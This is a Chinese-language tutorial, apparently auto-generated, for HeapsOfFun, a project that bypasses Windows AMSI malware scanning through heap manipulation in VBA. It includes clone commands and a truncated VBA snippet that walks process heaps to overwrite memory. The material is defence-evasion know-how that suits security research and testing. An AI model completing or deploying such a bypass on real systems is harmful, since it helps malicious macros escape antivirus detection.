HeapsOfFun 开源项目教程

HeapsOfFun 开源项目教程

HeapsOfFunAMSI Bypass Via the Heap项目地址:https://gitcode.com/gh_mirrors/he/HeapsOfFun

项目介绍

HeapsOfFun 是一个开源项目，旨在通过堆（Heap）绕过 AMSI（Anti-Malware Scan Interface）。该项目基于 Matt Graeber 的工作，提供了 VBA 代码来实现这一目的。项目支持 x32 和 x64 架构，主要用于安全研究和渗透测试。

项目快速启动

克隆项目

首先，克隆 HeapsOfFun 项目到本地：

git clone https://github.com/rmdavy/HeapsOfFun.git

运行示例代码

进入项目目录并查看示例代码 heapsoffun.bas：

cd HeapsOfFun
cat heapsoffun.bas

以下是示例代码的一部分：

Sub HeapsOfFun()
    Dim ProcessHeaps As Long
    Dim NumberOfHeaps As Long
    Dim PHE As PROCESS_HEAP_ENTRY
    Dim ReadBuffer As Long
    Dim WriteBuffer As Long
    'The value that we're going to write on the heap
    WriteBuffer = &HFFFFFFFF
    NumberOfHeaps = GetProcessHeaps(1, ProcessHeaps)
    'Debug Print Str(NumberOfHeaps) & " Handles to heaps that are active for the calling process"
    If NumberOfHeaps > 0 Then
        retval = HeapWalk(ProcessHeaps, PHE)
        'retval of 0 means failure
        If retval > 0 Then
            Do While HeapWalk(ProcessHeaps, PHE) <> 0
                'If PHE.wFlags And PROCESS_HEAP_ENTRY_BUSY) is not equal to 0 it means that we have an Allocated block
                If ((PHE.wFlags And PROCESS_HEAP_ENTRY_BUSY) <> 0) Then
                    'Copy

编译和运行

根据你的开发环境，编译并运行 heapsoffun.bas 文件。具体步骤可能因环境而异，请参考相关文档。

应用案例和最佳实践

应用案例

HeapsOfFun 项目主要用于以下场景：

1. 安全研究：研究人员可以使用该项目来测试和验证 AMSI 的绕过技术。
2. 渗透测试：渗透测试人员可以利用该项目来评估系统的安全性。

最佳实践

1. 代码审查：在使用该项目之前，务必进行代码审查，确保其安全性和合规性。
2. 环境隔离：在隔离的环境中测试和使用该项目，避免对生产环境造成影响。
3. 持续更新：关注项目的更新和安全公告，及时更新代码以应对新的安全挑战。

典型生态项目

HeapsOfFun 项目与以下生态项目相关：

1. Matt Graeber 的其他项目：Matt Graeber 在安全领域有多个项目，可以相互参考和学习。
2. AMSI 相关工具：其他 AMSI 绕过和分析工具，如 AMSITrigger 等。

通过结合这些生态项目，可以更全面地理解和应用 HeapsOfFun 项目。

HeapsOfFunAMSI Bypass Via the Heap项目地址:https://gitcode.com/gh_mirrors/he/HeapsOfFun